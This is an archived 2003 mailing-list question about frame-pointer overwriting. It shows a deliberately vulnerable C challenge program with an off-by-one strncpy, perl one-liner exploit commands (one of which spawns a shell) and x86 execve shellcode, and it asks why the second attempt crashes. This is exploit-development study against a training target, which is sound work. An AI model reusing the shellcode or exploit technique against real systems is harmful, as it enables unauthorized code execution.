Frame Pointer Overwriting

From: mike cramp (mikecc_at_unixclan.net)
Date: 05/23/03

  • Next message: Dave McKinney: "[Vuln-dev Challenge] Challenge #2" 
    To: vuln-dev@securityfocus.com
Date: 23 May 2003 10:24:59 -0700

    Hey guys,

    I'm having some trouble with frame pointer overwriting, and I was
    wondering if anyone could shed any light on this.

    First of all, here is the vulnerable program:

    mikecc@darkstar frame $ cat vuln_6.c
    /* Is It Vulnerable!? you sure? check again! */
    /*
     * bob.dtors.net
     *
     * ---------------------------------------------------
     * Dtors Security Research (DSR)
     * Code by: bob
     * Mail: bob@dtors.net
     * ---------------------------------------------------
     *
     * Build it and exploit it
     * show us the exploitation log and get extra rights !!
     *
     *
     * Is It Vulnerable!? you sure? check again!
     * -- this code was taken from bobs person homepage
     * http://it.dtors.net
    */

    #include <stdio.h>
    #include <string.h>
    #define SIZE 256

    void bob(char *ptr) {
            char buffer[SIZE];
            strncpy(buffer, ptr, SIZE+1);
    printf("buffer is at %p\n",buffer);
          {
            int a,b;
          for (a=b=0;a<=SIZE;a++,b+=3) {
             if (b!=0 && !(b%26)) printf("\n");
             printf("%02x ", (unsigned char)buffer[a]);
          }
          printf("\n");
       }
    }

    int main(int argc, char **argv, char **envp) {
       if (argc < 2)
       {
       fprintf(stdout, "bob@dtors.net\n");
       exit(1);
       }
       bob(argv[1]);
       return 0;
    }
    mikecc@darkstar frame $

    Now, I can exploit this if I store the shellcode in the environment:

    mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 .
    "\x00"'`
    buffer is at 0xbffff4a8
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
    ff bf
    d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
    d0 fd
    ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00
    sh-2.05b$

    But, I do not understand how to find the overflow byte, or why this one
    works: \x00

    Now since I am researching a remote frame pointer overwrite, I need to
    learn how to store the exploit string in the command line:

    mikecc@darkstar frame $ ./6 `perl -e 'print
    "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . "\x09"'`
    buffer is at 0xbffff6a8
    6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90
    63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
    ff bf
    63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
    63 f9
    ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00
    Illegal instruction (core dumped)
    mikecc@darkstar frame $

    When I open up the core dump, I check ebp:

    (gdb) i reg ebp
    ebp 0xbffff963 0xbffff963
    (gdb)

    Now since I cannot copy and paste weird ASCII characters in Evolution, I
    do:

    x/s $ebp

    and it shows my shellcode. Why is this not executing a shell?

    Thanks,

    Mike

  • Next message: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"